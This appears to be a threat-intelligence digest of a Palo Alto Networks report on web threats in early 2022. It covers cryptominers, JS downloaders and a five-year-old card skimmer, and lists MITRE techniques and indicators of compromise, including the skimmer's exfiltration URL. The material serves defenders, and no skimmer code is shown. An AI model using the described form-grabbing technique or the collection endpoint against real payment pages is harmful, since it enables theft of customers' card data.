Threat Research

Trends in Web Threats: Old Web Skimmer Still Active Today

Securonix

Palo Alto Networks analyzes trends in web threats by examining malicious landing and host URLs, including where they are hosted, their categories, and associated malware families, with a focus on cryptominers, JS downloaders, web skimmers, and redirects. The report also details a long-running web skimmer that remains active across multiple sites, illustrating that old threats can persist for years and emphasizing the need for continued protection and user caution. #WebSkimmer #Cloudfusion #jquery.min.js #cryptominer #JSDownloader

Keypoints

  • January–March 2022 saw 577,275 landing URL incidents (116,643 unique) and 2,043,862 malicious host URL incidents (180,370 unique).
  • Malicious landing URLs originated from 22,279 unique domains, with the United States leading, followed by Germany and Russia, often via proxies or VPNs.
  • Landing URLs tended to target business/economy sites, personal sites/blogs, and shopping sites, showing attackers’ tendency to exploit seemingly benign sites.
  • Top web threats were cryptominers, JavaScript downloaders, web skimmers, web scams, and JS redirectors, with JS downloaders most active early in 2022.
  • The web skimmer case study reveals a five-year-active threat that injects lightly obfuscated JS into payment pages, collects form inputs, and exfiltrates data to cloudfusion.me.
  • Protection relies on Advanced URL Filtering and Threat Prevention; users should exercise caution and organizations should monitor for ongoing web threats and mobile/online payment page integrity.

MITRE Techniques

  • [T1189] Drive-by Compromise – Malicious landing URLs provide an opportunity for a user to click a malicious link. ‘a malicious landing URL … that provides an opportunity for a user to click a malicious link’
  • [T1056.003] Web Form Grabbing – The skimmer collects inputs from the page’s input/select elements and other sensitive information when the button is clicked. ‘The code collects the inputs from the input and select elements (as well as other sensitive information from customers) when the button is clicked.’
  • [T1059.007] JavaScript – JavaScript is used to host/execute the malicious code, including lightly obfuscated scripts. ‘into the target web page with a lightly obfuscated JS code’
  • [T1041] Exfiltration Over C2 Channel – Exfiltration of stolen data to a remote server controlled by the attacker. ‘The code then sends that information to the remote collection server, https://cloudfusion[.]me/cdn/jquery.min.js, which is controlled by the attacker.’
  • [T1027] Obfuscated/Compressed Files and Information – Use of obfuscated JavaScript to hide malicious behavior. ‘lightly obfuscated JS code’
  • [T1496] Resource Hijacking – Cryptominer activity represents unauthorized use of resources. ‘The top five web threats we observed are cryptominers, JavaScript (JS) downloaders, web skimmers, web scams and JS redirectors.’

Indicators of Compromise

  • [SHA256] Malicious web skimmer hashes – 79eedf9c1b974992a4beada1bd6343ecadece0b413acccd4deded4a49a4ad220, 992cfcb5790664d02204e5356e3dd6e109f0cba90b8e552598f2afb11f468a1f
  • [Domain] Malicious hosting domains – cloudfusion.me, voques-tfr.xyz, misuperblog.com, yhys93.site
  • [IP] Malicious hosting IPs – 198.54.117.197, 198.54.117.198, 198.54.117.199, 198.54.117.200
  • [URL] Remote collection/exfiltration URL – https://cloudfusion.me/cdn/jquery.min.js
  • [File Name] Web skimmer payload file – jquery.min.js

Read more: https://unit42.paloaltonetworks.com/web-threat-trends-web-skimmer/